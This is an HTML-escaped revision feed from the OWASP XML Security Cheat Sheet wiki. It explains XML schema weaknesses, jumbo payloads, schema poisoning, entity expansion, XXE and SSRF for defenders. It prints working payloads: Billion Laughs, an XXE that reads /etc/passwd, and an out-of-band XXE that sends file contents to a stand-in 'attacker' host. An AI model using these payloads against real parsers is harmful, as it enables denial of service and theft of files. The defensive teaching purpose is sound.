  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224436</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224436"/>
				<updated>2016-12-21T20:23:11Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
